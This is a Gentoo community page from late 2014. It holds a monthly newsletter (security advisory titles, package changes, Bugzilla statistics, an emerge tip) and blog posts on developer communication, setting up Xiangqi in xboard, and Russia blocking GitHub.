201411-11 net-proxy/squid Squid: Multiple vulnerabilities 504176
201411-10 net-misc/asterisk Asterisk: Multiple Vulnerabilities 523216
201411-09 app-admin/ansible Ansible: Privilege escalation 516564
201411-08 net-wireless/aircrack-ng Aircrack-ng: User-assisted execution of arbitrary code 528132
201411-07 net-misc/openswan Openswan: Denial of Service 499870
201411-06 www-plugins/adobe-flash Adobe Flash Player: Multiple vulnerabilities 525430
201411-05 net-misc/wget GNU Wget: Arbitrary code execution 527056
201411-04 dev-lang/php PHP: Multiple vulnerabilities 525960
201411-03 net-misc/tigervnc TigerVNC: User-assisted execution of arbitrary code 505170
201411-02 dev-db/mysql (and 1 more) MySQL, MariaDB: Multiple vulnerabilities 525504
201411-01 media-video/vlc VLC: Multiple vulnerabilities 279340

Package Removals/Additions

Removals

Package Developer Date
dev-php/adodb-ext grknight 01 Nov 2014
dev-php/eaccelerator grknight 01 Nov 2014
dev-php/pecl-apc grknight 01 Nov 2014
dev-php/pecl-id3 grknight 01 Nov 2014
dev-php/pecl-mogilefs grknight 01 Nov 2014
dev-php/pecl-sca_sdo grknight 01 Nov 2014
app-text/pastebin dilfridge 02 Nov 2014
sys-devel/libperl dilfridge 08 Nov 2014
dev-perl/Lucene dilfridge 08 Nov 2014
razorqt-base/libqtxdg yngwin 08 Nov 2014
virtual/perl-Version-Requirements dilfridge 08 Nov 2014
perl-core/Version-Requirements dilfridge 08 Nov 2014
dev-python/python-exec mgorny 08 Nov 2014
sys-devel/bfin-toolchain vapier 08 Nov 2014
dev-python/gns3-gui idella4 09 Nov 2014
dev-python/sparqlwrapper idella4 09 Nov 2014
app-accessibility/gnome-mag pacho 13 Nov 2014
app-accessibility/gnome-speech pacho 13 Nov 2014
app-accessibility/gok pacho 13 Nov 2014
app-admin/gnome-system-tools pacho 13 Nov 2014
app-admin/pessulus pacho 13 Nov 2014
app-admin/sabayon pacho 13 Nov 2014
app-crypt/seahorse-plugins pacho 13 Nov 2014
app-pda/gnome-pilot pacho 13 Nov 2014
app-pda/gnome-pilot-conduits pacho 13 Nov 2014
dev-cpp/libgdamm pacho 13 Nov 2014
dev-cpp/libpanelappletmm pacho 13 Nov 2014
dev-python/brasero-python pacho 13 Nov 2014
dev-python/bug-buddy-python pacho 13 Nov 2014
dev-python/evince-python pacho 13 Nov 2014
dev-python/evolution-python pacho 13 Nov 2014
dev-python/gnome-applets-python pacho 13 Nov 2014
dev-python/gnome-desktop-python pacho 13 Nov 2014
dev-python/gnome-media-python pacho 13 Nov 2014
dev-python/libgda-python pacho 13 Nov 2014
dev-python/libgksu-python pacho 13 Nov 2014
dev-python/libgnomeprint-python pacho 13 Nov 2014
dev-python/libgtop-python pacho 13 Nov 2014
dev-python/totem-python pacho 13 Nov 2014
gnome-base/gnome-applets pacho 13 Nov 2014
gnome-base/gnome-fallback pacho 13 Nov 2014
gnome-base/gnome-panel pacho 13 Nov 2014
app-accessibility/morseall pacho 13 Nov 2014
app-accessibility/java-access-bridge pacho 13 Nov 2014
gnome-extra/libgail-gnome pacho 13 Nov 2014
app-accessibility/dasher pacho 13 Nov 2014
gnome-extra/bug-buddy pacho 13 Nov 2014
gnome-extra/deskbar-applet pacho 13 Nov 2014
gnome-extra/evolution-exchange pacho 13 Nov 2014
gnome-extra/evolution-webcal pacho 13 Nov 2014
gnome-extra/fast-user-switch-applet pacho 13 Nov 2014
gnome-extra/gcalctool pacho 13 Nov 2014
gnome-extra/gnome-audio pacho 13 Nov 2014
gnome-extra/gnome-games-extra-data pacho 13 Nov 2014
gnome-extra/gnome-games pacho 13 Nov 2014
gnome-extra/gnome-media pacho 13 Nov 2014
gnome-extra/gnome-screensaver pacho 13 Nov 2014
gnome-extra/gnome-swallow pacho 13 Nov 2014
gnome-extra/hamster-applet pacho 13 Nov 2014
gnome-extra/lock-keys-applet pacho 13 Nov 2014
gnome-extra/nautilus-open-terminal pacho 13 Nov 2014
gnome-extra/panflute pacho 13 Nov 2014
gnome-extra/sensors-applet pacho 13 Nov 2014
gnome-extra/file-browser-applet pacho 13 Nov 2014
gnome-extra/gnome-hdaps-applet pacho 13 Nov 2014
media-gfx/byzanz pacho 13 Nov 2014
net-analyzer/gnome-netstatus pacho 13 Nov 2014
net-analyzer/netspeed_applet pacho 13 Nov 2014
x11-misc/glunarclock pacho 13 Nov 2014
gnome-extra/swfdec-gnome pacho 13 Nov 2014
gnome-extra/tasks pacho 13 Nov 2014
media-gfx/shared-color-profiles pacho 13 Nov 2014
net-libs/gupnp-vala pacho 13 Nov 2014
media-libs/swfdec pacho 13 Nov 2014
net-libs/farsight2 pacho 13 Nov 2014
net-libs/libepc pacho 13 Nov 2014
net-misc/drivel pacho 13 Nov 2014
net-misc/blogtk pacho 13 Nov 2014
net-misc/gnome-blog pacho 13 Nov 2014
net-misc/tsclient pacho 13 Nov 2014
www-client/epiphany-extensions pacho 13 Nov 2014
www-plugins/swfdec-mozilla pacho 13 Nov 2014
x11-themes/gnome-themes pacho 13 Nov 2014
x11-themes/gnome-themes-extras pacho 13 Nov 2014
x11-themes/gtk-engines-cleanice pacho 13 Nov 2014
x11-themes/gtk-engines-dwerg pacho 13 Nov 2014
x11-plugins/wmlife pacho 13 Nov 2014
dev-dotnet/gtkhtml-sharp pacho 13 Nov 2014
dev-util/mono-tools pacho 13 Nov 2014
net-libs/telepathy-farsight pacho 13 Nov 2014
x11-themes/gdm-themes pacho 13 Nov 2014
x11-themes/metacity-themes pacho 13 Nov 2014
x11-wm/metacity pacho 13 Nov 2014
gnome-base/libgdu pacho 13 Nov 2014
rox-base/rox-media pacho 13 Nov 2014
dev-python/gns3-gui patrick 14 Nov 2014
kde-misc/kcm_touchpad mrueg 15 Nov 2014
net-misc/ieee-oui zerochaos 19 Nov 2014
app-shells/zsh-completion radhermit 21 Nov 2014
app-dicts/gnuvd pacho 21 Nov 2014
net-misc/netcomics-cvs pacho 21 Nov 2014
dev-python/kinterbasdb pacho 21 Nov 2014
dev-libs/ibpp pacho 21 Nov 2014
dev-php/PEAR-MDB2_Driver_ibase pacho 21 Nov 2014
net-im/kmess pacho 21 Nov 2014
games-server/halflife-steam pacho 21 Nov 2014
sys-apps/usleep pacho 21 Nov 2014
dev-util/cmockery radhermit 24 Nov 2014
dev-python/pry radhermit 24 Nov 2014
dev-perl/DateTime-Format-DateManip zlogene 26 Nov 2014
www-servers/ocsigen aballier 27 Nov 2014
dev-ml/ocamlduce aballier 27 Nov 2014
dev-perl/Mail-ClamAV zlogene 27 Nov 2014
dev-perl/SVN-Mirror zlogene 27 Nov 2014
dev-embedded/msp430-binutils radhermit 27 Nov 2014
dev-embedded/msp430-gcc radhermit 27 Nov 2014
dev-embedded/msp430-gdb radhermit 27 Nov 2014
dev-embedded/msp430-libc radhermit 27 Nov 2014
dev-embedded/msp430mcu radhermit 27 Nov 2014
mail-filter/spamassassin-fuzzyocr dilfridge 29 Nov 2014

Additions

Package Developer Date
dev-python/python-bugzilla dilfridge 01 Nov 2014
app-vim/sudoedit radhermit 01 Nov 2014
dev-java/icedtea-sound caster 01 Nov 2014
dev-perl/Net-Trackback dilfridge 01 Nov 2014
dev-perl/Syntax-Highlight-Engine-Simple dilfridge 01 Nov 2014
dev-perl/Syntax-Highlight-Engine-Simple-Perl dilfridge 01 Nov 2014
app-i18n/fcitx-qt5 yngwin 02 Nov 2014
virtual/postgresql titanofold 02 Nov 2014
dev-python/oslo-i18n alunduil 02 Nov 2014
dev-libs/libltdl vapier 03 Nov 2014
dev-texlive/texlive-langchinese aballier 03 Nov 2014
dev-texlive/texlive-langjapanese aballier 03 Nov 2014
dev-texlive/texlive-langkorean aballier 03 Nov 2014
app-misc/ltunify radhermit 05 Nov 2014
dev-vcs/gitsh jlec 05 Nov 2014
dev-python/pypy3 mgorny 05 Nov 2014
virtual/pypy3 mgorny 05 Nov 2014
dev-php/PEAR-Math_BigInteger grknight 06 Nov 2014
games-rpg/morrowind-data hasufell 06 Nov 2014
games-engines/openmw hasufell 06 Nov 2014
dev-perl/URI-Encode dilfridge 06 Nov 2014
dev-perl/MIME-Base32 dilfridge 08 Nov 2014
dev-libs/libqtxdg yngwin 08 Nov 2014
app-admin/lxqt-admin jauhien 08 Nov 2014
dev-python/oslo-utils alunduil 08 Nov 2014
net-misc/gns3-server idella4 09 Nov 2014
dev-python/gns3-gui idella4 09 Nov 2014
dev-python/pypy3-bin mgorny 09 Nov 2014
dev-python/oslo-serialization alunduil 09 Nov 2014
dev-python/bashate prometheanfire 10 Nov 2014
dev-python/ldappool prometheanfire 10 Nov 2014
dev-python/repoze-who prometheanfire 10 Nov 2014
dev-python/pysaml2 prometheanfire 10 Nov 2014
dev-python/posix_ipc prometheanfire 10 Nov 2014
dev-python/oslo-db prometheanfire 10 Nov 2014
dev-ml/enumerate aballier 10 Nov 2014
dev-ml/core_bench aballier 10 Nov 2014
dev-util/sysdig mgorny 11 Nov 2014
dev-python/singledispatch idella4 12 Nov 2014
dev-tex/biblatex-apa mrueg 12 Nov 2014
app-emacs/multiple-cursors ulm 12 Nov 2014
dev-python/libnacl chutzpah 13 Nov 2014
dev-python/ioflo chutzpah 13 Nov 2014
dev-python/raet chutzpah 13 Nov 2014
dev-qt/qtchooser pesa 13 Nov 2014
dev-python/dicttoxml chutzpah 13 Nov 2014
dev-python/moto chutzpah 13 Nov 2014
dev-python/gns3-gui idella4 13 Nov 2014
x11-plugins/wmlife voyageur 13 Nov 2014
net-misc/gns3-gui patrick 14 Nov 2014
games-rpg/a-bird-story hasufell 14 Nov 2014
virtual/python-singledispatch idella4 15 Nov 2014
dev-python/kiwisolver idella4 15 Nov 2014
app-forensics/afl hanno 16 Nov 2014
games-board/gambit sping 16 Nov 2014
dev-db/pgrouting titanofold 16 Nov 2014
dev-python/atom idella4 16 Nov 2014
dev-embedded/kobs-ng vapier 18 Nov 2014
dev-python/ordereddict prometheanfire 18 Nov 2014
dev-python/WSME prometheanfire 18 Nov 2014
dev-python/retrying prometheanfire 18 Nov 2014
dev-python/osprofiler prometheanfire 18 Nov 2014
dev-python/glance_store prometheanfire 18 Nov 2014
dev-python/python-barbicanclient prometheanfire 18 Nov 2014
dev-python/rfc3986 prometheanfire 19 Nov 2014
sys-cluster/libquo ottxor 19 Nov 2014
dev-python/flask-migrate patrick 20 Nov 2014
media-libs/libde265 dlan 20 Nov 2014
dev-python/pyqtgraph radhermit 20 Nov 2014
app-shells/gentoo-zsh-completions radhermit 21 Nov 2014
app-shells/zsh-completions radhermit 21 Nov 2014
dev-libs/libsecp256k1 blueness 21 Nov 2014
net-libs/libbitcoinconsensus blueness 21 Nov 2014
net-misc/gns3-converter idella4 22 Nov 2014
dev-python/pytest-timeout jlec 22 Nov 2014
net-dns/libidn2 jer 22 Nov 2014
app-emulation/vpcs idella4 23 Nov 2014
dev-libs/libmacaroons patrick 23 Nov 2014
app-vim/emmet radhermit 24 Nov 2014
sci-libs/orocos-bfl aballier 25 Nov 2014
sys-libs/efivar floppym 26 Nov 2014
dev-python/jmespath aballier 26 Nov 2014
net-misc/python-x2go voyageur 27 Nov 2014
net-misc/pyhoca-cli voyageur 27 Nov 2014
dev-python/simplekv aballier 27 Nov 2014
dev-python/Flask-KVSession aballier 27 Nov 2014
net-misc/pyhoca-gui voyageur 27 Nov 2014
dev-libs/fstrm radhermit 27 Nov 2014
sci-libs/fcl aballier 28 Nov 2014
dev-ml/labltk aballier 28 Nov 2014
dev-ml/camlp4 aballier 28 Nov 2014
dev-python/sphinxcontrib-doxylink aballier 28 Nov 2014
dev-util/cpputest radhermit 29 Nov 2014
app-text/groonga grknight 29 Nov 2014
app-text/groonga-normalizer-mysql grknight 29 Nov 2014
app-forensics/volatility chithanh 29 Nov 2014
dev-perl/Test-FailWarnings dilfridge 30 Nov 2014
dev-perl/RedisDB-Parser dilfridge 30 Nov 2014
dev-perl/RedisDB dilfridge 30 Nov 2014
dev-python/nose_fixes idella4 30 Nov 2014
dev-perl/MooX-Types-MooseLike-Numeric dilfridge 30 Nov 2014

Bugzilla

The Gentoo community uses Bugzilla to record and track bugs, notifications, suggestions and other interactions with the development team.

Activity

The following tables and charts summarize the activity on Bugzilla between 01 November 2014 and 01 December 2014. Not fixed means bugs that were resolved as NEEDINFO, WONTFIX, CANTFIX, INVALID or UPSTREAM.
[Chart: Bugzilla activity (gmn-activity-2014-12)]

Bug Activity Number
New 1858
Closed 1151
Not fixed 215
Duplicates 164
Total 6294
Blocker 4
Critical 14
Major 66

Closed bug ranking

The following table outlines the teams and developers with the most bugs resolved during this period

Rank Team/Developer Bug Count
1 Gentoo Security 57
2 Gentoo's Team for Core System packages 54
3 Gentoo Linux Gnome Desktop Team 39
4 Gentoo Perl team 32
5 Tim Harder 30
6 Gentoo Games 29
7 Gentoo KDE team 27
8 Java team 27
9 Gentoo Ruby Team 26
10 Others 829

[Chart: closed bug ranking (gmn-closed-2014-12)]

Assigned bug ranking

The developers and teams who have been assigned the most bugs during this period are as follows.

Rank Team/Developer Bug Count
1 Python Gentoo Team 104
2 Gentoo Linux bug wranglers 97
3 Gentoo Linux Gnome Desktop Team 69
4 Gentoo Security 62
5 Gentoo's Team for Core System packages 56
6 Gentoo KDE team 44
7 Java team 38
8 Default Assignee for New Packages 37
9 Qt Bug Alias 33
10 Others 1317

[Chart: assigned bug ranking (gmn-opened-2014-12)]

Tips of the month

(by Alexander Berntsen)
New --alert emerge option

From the emerge(1) manpage

--alert [ y | n ] (-A short option) Add a terminal bell character (‘\a’) to all interactive prompts. This is especially useful if dependency resolution is taking a long time, and you want emerge to alert you when it is finished. If you use emerge -auAD world, emerge will courteously point out when it has finished calculating the graph.

--alert may be ‘y’ or ‘n’. ‘true’ and ‘false’ mean the same thing. Using --alert without an option is the same as using it with ‘y’. Try it with ‘emerge -aA portage’.

If your terminal emulator is set up to make ‘\a’ into a window manager urgency hint, move your cursor to a different window to get the effect.
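
If you like the bell enough to want it on every run, one option (an illustrative snippet, not taken from the manpage) is to add it to your default emerge options in /etc/portage/make.conf:

# /etc/portage/make.conf
EMERGE_DEFAULT_OPTS="${EMERGE_DEFAULT_OPTS} --alert"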

 

Send us your favorite Gentoo script or tip at gmn@gentoo.org

Getting Involved?

Interested in helping out? The GMN relies on volunteers and members of the community for content every month. If you are interested in writing for the GMN or thinking of another way to contribute, please send an e-mail to gmn@gentoo.org.

Comments or Suggestions?

Please head over to this forum post.

Sven Vermeulen a.k.a. swift (homepage, bugs)
Sometimes I forget how important communication is (December 10, 2014, 18:38 UTC)

Free software (and documentation) developers don’t always have all the time they want. Instead, they grab whatever time they have to do what they believe is the most productive – be it documentation editing, programming, updating ebuilds, SELinux policy improvements and what not. But they often don’t take the time to communicate. And communication is important.

For one, communication is needed to reach a larger audience than those who follow the commit history in whatever repository work is being done. Yes, there are developers that follow each commit, but development isn't just done for developers, it is also for end users. And end users deserve frequent updates and feedback. Be it through blog posts, Google+ posts, tweets or Instagram posts (well, I'm not sure how to communicate a software or documentation change through Instagram, but I'm sure people find lots of creative ways to do so), telling the broader world what has changed is important.

Perhaps a (silent or not) user was waiting for this change. Perhaps he or she is even actually trying to fix things himself/herself but is struggling with it, and would really benefit (time-wise) from a quick fix. Without communication about the change, (s)he does not know that no further attempts are needed, which actually reduces overall efficiency.

But that kind of communication is only one-way. Better still is to get feedback as well. In that sense, communication is just one part of the feedback loop: once developers receive feedback on what they are doing (or did recently), they might even improve results faster. With feedback loops, the wisdom of the crowd (in the positive sense) can be used to improve solutions beyond what the developer originally intended. And even a simple “cool” or “I like” is good information for a developer or contributor.

Still, I often forget to do it – or don’t have the time to focus on communication. And that’s bad. So, let me quickly state what things I forgot to communicate more broadly about:

  • A new developer joined the Gentoo ranks: Jason Zaman. Now, developers join Gentoo more often than just once in a while, but Jason is one of my “recruits”. In a sense, he became a developer because I was tired of pulling his changes in and proxy-committing stuff. Of course, that’s only half the truth; he is also a very active contributor in other areas (and was already a maintainer for a few packages through the proxy-maintainer project) and is a tremendous help in the Gentoo Hardened project. So welcome aboard, Jason (or perfinion, as he calls himself online).
  • I’ve started copying the Gentoo handbook to the wiki. This is still an ongoing project, but it was long overdue. There are many reasons why the move to the wiki is interesting. For me personally, it is to attract a larger audience to update the handbook. Although editing the document will be restricted to developers and trusted contributors only (it does contain the installation instructions and is a primary entry point for many users), that is still a whole lot more than the handful (one or two, actually) of developers who update the handbook today.
  • The SELinux userspace (2.4 release) is looking more stable; there are no specific regressions anymore (upstream is at release candidate 7), although I must admit that I have not deployed it on the majority of the test systems that I maintain. Not out of fear, but mostly because I struggle a bit with available time, so I skip testing upgrades that are not strictly needed. I do plan on moving towards 2.4 in a week or two.
  • A new version of the reference policy has been released. Gentoo quickly followed through (Jason did the honors of creating the ebuilds).

So, apologies for not communicating sooner, and I promise I’ll try to communicate more frequently.

December 08, 2014
Sebastian Pipping a.k.a. sping (homepage, bugs)
Playing Xiangqi with xboard (December 08, 2014, 20:06 UTC)

Introduction

Out of the box, xboard expects you to play western chess. It does support Xiangqi, but the default setup uses ugly western pieces and western square fields rather than lines.

You can make it look more traditional...

... but it is not really trivial to get there. Windows users have a WinBoard Xiangqi installer as an option, but Linux users don’t.
You could select the board theme “xiangqi” at

MENU / View / Board / # ORIENTAL THEMES / double click on "xiangqi"

but you would end up with broken board scaling (despite xboard 2.8 knowing how to do better) without further tuning.

To summarize, you have to teach xboard to

  1. play variant “xiangqi” rather than western chess,
  2. use different graphics, and
  3. get the board scaling right.

The following is a list of related options and how to get board scaling right by using a special symlink.

Prerequisites

  • xboard 2.8 or later (for proper scaling of the board image, see below)
  • a Xiangqi engine, e.g.
    • HoiXiangqi (of HoiChess, games-board/hoichess in Gentoo betagarden) or
    • MaxQi (of FairyMax, games-board/fairymax in Gentoo betagarden).
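
To install one of these engines on Gentoo, something like the following should work (a sketch assuming the betagarden overlay and the package names listed above; pick whichever engine you prefer):

sudo layman -a betagarden                    # add the betagarden overlay
sudo emerge -av games-board/hoichess         # provides HoiXiangqi
# or: sudo emerge -av games-board/fairymax   # provides MaxQi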

Command line view

Now some command line parameters need to be passed to xboard:

Tell the engine to play chess variant “xiangqi”:

-variant xiangqi

Use images for drawing the board:

-useBoardTexture true

Use xqboard-9x10.png for drawing both light and dark fields of the board:

-liteBackTextureFile /usr/share/games/xboard/themes/textures/xqboard-9x10.png
-darkBackTextureFile /usr/share/games/xboard/themes/textures/xqboard-9x10.png

xqboard-9x10.png can be a symlink to xqboard.png. The “-9x10” part is for the filename parser introduced with xboard 2.8. It ensures proper board rendering at any window size. Without that naming (and with earlier versions), you need luck to get proper scaling.
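
If your xboard installation only ships xqboard.png, the “-9x10” variant can simply be a symlink next to it. A minimal sketch, assuming the texture directory used in the options above:

cd /usr/share/games/xboard/themes/textures
sudo ln -s xqboard.png xqboard-9x10.png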

Suppress drawing squares (of default line-width 1px) around fields:

-overrideLineGap 0

Use SVG images of the traditional Xiangqi pieces:

-pieceImageDirectory /usr/share/games/xboard/themes/xiangqi

Suppress grayscale conversion of piece graphics applied by default:

-trueColors true

Use HoiXiangqi for an engine:

-firstChessProgram /usr/games/bin/hoixiangqi
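
Putting it all together, the full invocation might look something like this (nothing new here, just the options from above combined into one command; adjust the paths if your distribution installs the themes elsewhere):

xboard -variant xiangqi \
       -useBoardTexture true \
       -liteBackTextureFile /usr/share/games/xboard/themes/textures/xqboard-9x10.png \
       -darkBackTextureFile /usr/share/games/xboard/themes/textures/xqboard-9x10.png \
       -overrideLineGap 0 \
       -pieceImageDirectory /usr/share/games/xboard/themes/xiangqi \
       -trueColors true \
       -firstChessProgram /usr/games/bin/hoixiangqi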

If you are running Gentoo, feel free to

sudo layman -a betagarden
sudo emerge -av games-board/xboard-xiangqi

to make that a little easier.

December 06, 2014
Sebastian Pipping a.k.a. sping (homepage, bugs)
Russia blocks access to GitHub (December 06, 2014, 15:03 UTC)

Russia Blacklists, Blocks GitHub Over Pages That Refer To Suicide

http://techcrunch.com/2014/12/03/github-russia/